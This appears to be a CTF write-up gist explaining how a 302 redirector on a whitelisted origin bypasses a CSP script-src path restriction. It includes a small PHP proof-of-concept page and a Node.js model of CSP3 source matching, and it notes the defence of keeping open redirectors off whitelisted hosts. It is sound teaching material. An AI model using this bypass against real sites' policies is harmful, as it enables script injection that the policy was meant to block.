@nani1337
Created December 21, 2017 06:12
In HCTF (Hangzhou Dianzi University), the first leg of this year's XCTF, there was a challenge that used a 302 redirect to bypass the CSP restriction. I didn't know about this trick, so I looked into it afterwards.
Bypassing CSP with a 302 redirect is subject to the following restrictions:
1. The "springboard" (the URL that answers with the redirect) must itself match the allowed source list, path included, because the initial request is checked in full.
2. Only the scheme, host and port of the redirect target are checked against the allowed source; the path part is ignored once a redirect has been followed. For example, with script-src http://abc.xyz/asdf, a script fetched directly must be exactly http://abc.xyz/asdf, but a script reached through a redirect only has to be served from http://abc.xyz, and its path can be anything, such as http://abc.xyz/xxx/xx.
This is specified behaviour rather than a browser bug: CSP Level 2 and Level 3 deliberately skip the path check after a redirect so that a policy cannot be used to probe where a cross-origin redirect lands. It therefore works in every conformant browser, and the practical defence is to keep open redirectors off whitelisted hosts (or to whitelist only hosts you fully control).
For example, create a PHP page with the following code:
<?php
// Page served from 127.0.0.1 ('self'). The only other allowed script source is
// http://x.x.x.x/asdf, i.e. host x.x.x.x restricted to the path /asdf.
header("Content-Security-Policy: default-src 'self'; script-src 'self' http://x.x.x.x/asdf");
?>
<html>
<!-- 302.php lives on 'self', so the initial request is allowed. It answers with a
     302 to the URL in its query string, http://x.x.x.x/test/1.js, which the browser
     then checks with the path ignored: host x.x.x.x is whitelisted, so 1.js runs. -->
<script src="http://127.0.0.1/test/302.php?http://x.x.x.x/test/1.js">
</script>
</html>
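To make the two restrictions above concrete, here is an added example (not part of the original gist) that models how a CSP-conformant browser matches a fetched URL against a script-src source list, following the CSP Level 3 algorithm "Does url match expression in origin with redirect count?". It runs under Node.js using the built-in URL class. The policy, origin and URLs are the ones from the PHP page above; the function names and the host evil.example are assumptions made for this demonstration, and nonce/hash sources and the 'self' https-upgrade rule are left out for brevity.

```javascript
// Added example: model of CSP3 §6.7.2.7 source-expression matching, enough to
// show why the 302 springboard works. Not code from the gist or any browser.
// Assumed names: everything below; assumed host: evil.example (made up).

const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

function effectivePort(url) {
  return url.port || DEFAULT_PORTS[url.protocol] || "";
}

// Split a host-source such as "http://x.x.x.x/asdf" or "*.cdn.test:8443/js/"
// into its scheme-part, host-part, port-part and path-part.
function parseHostSource(expr) {
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^:\/*?#]+)(?::(\d+|\*))?(\/[^?#]*)?$/i.exec(expr);
  if (!m) throw new Error("unsupported source expression: " + expr);
  return {
    scheme: m[1] ? m[1].toLowerCase() + ":" : null,
    host: m[2].toLowerCase(),
    port: m[3] || null,
    path: m[4] || null,
  };
}

function schemeMatches(exprScheme, urlScheme) {
  if (exprScheme === urlScheme) return true;
  // CSP3 lets an http: (ws:) source match the secure variant of the scheme.
  return (exprScheme === "http:" && urlScheme === "https:") ||
         (exprScheme === "ws:" && urlScheme === "wss:");
}

function hostMatches(exprHost, urlHost) {
  if (exprHost === "*") return true;
  if (exprHost.startsWith("*.")) {
    const suffix = exprHost.slice(1);               // "*.example.com" -> ".example.com"
    return urlHost.length > suffix.length && urlHost.endsWith(suffix);
  }
  return exprHost === urlHost;
}

// Does urlStr match the single source expression expr for a document at origin,
// given that redirectCount redirects were followed to reach it?
function urlMatchesSource(expr, urlStr, origin, redirectCount) {
  const url = new URL(urlStr);
  const o = new URL(origin);
  if (expr === "'self'") {
    return url.protocol === o.protocol && url.hostname === o.hostname &&
           effectivePort(url) === effectivePort(o);
  }
  const src = parseHostSource(expr);
  if (!schemeMatches(src.scheme || o.protocol, url.protocol)) return false;
  if (!hostMatches(src.host, url.hostname)) return false;
  if (src.port === null) {
    if (url.port !== "") return false;              // must be the scheme's default port
  } else if (src.port !== "*" && src.port !== effectivePort(url)) {
    return false;
  }
  // The path-part is only consulted on the initial request: once a redirect
  // has been followed the browser deliberately skips this check, which is the
  // whole basis of the 302 bypass.
  if (src.path !== null && redirectCount === 0) {
    if (src.path.endsWith("/")) {
      if (!url.pathname.startsWith(src.path)) return false;
    } else if (url.pathname !== src.path) {
      return false;
    }
  }
  return true;
}

function sourceListAllows(sourceList, urlStr, origin, redirectCount) {
  return sourceList.split(/\s+/).filter(Boolean)
    .some((expr) => urlMatchesSource(expr, urlStr, origin, redirectCount));
}

// A script load is allowed only if every URL in its redirect chain is allowed;
// hop i is checked with redirectCount = i, so only hop 0 gets the path check.
function chainAllowed(sourceList, chain, origin) {
  return chain.every((urlStr, i) => sourceListAllows(sourceList, urlStr, origin, i));
}

const POLICY = "'self' http://x.x.x.x/asdf";        // script-src from the PHP header above
const ORIGIN = "http://127.0.0.1";
const SPRINGBOARD = "http://127.0.0.1/test/302.php?http://x.x.x.x/test/1.js";
const TARGET = "http://x.x.x.x/test/1.js";

console.log("direct load of 1.js:", sourceListAllows(POLICY, TARGET, ORIGIN, 0));                       // false
console.log("via 302.php on self:", chainAllowed(POLICY, [SPRINGBOARD, TARGET], ORIGIN));               // true
console.log("redirect to other host:", chainAllowed(POLICY, [SPRINGBOARD, "http://evil.example/1.js"], ORIGIN)); // false
console.log("springboard not whitelisted:", chainAllowed(POLICY, ["http://evil.example/r", TARGET], ORIGIN));    // false
```

The four calls at the bottom cover both restrictions: the direct fetch of 1.js fails on the path check, the same URL passes once it is hop 1 of a chain whose hop 0 is on 'self', a redirect to a host outside the list is still refused, and a springboard that is not itself whitelisted is refused before the redirect is even followed.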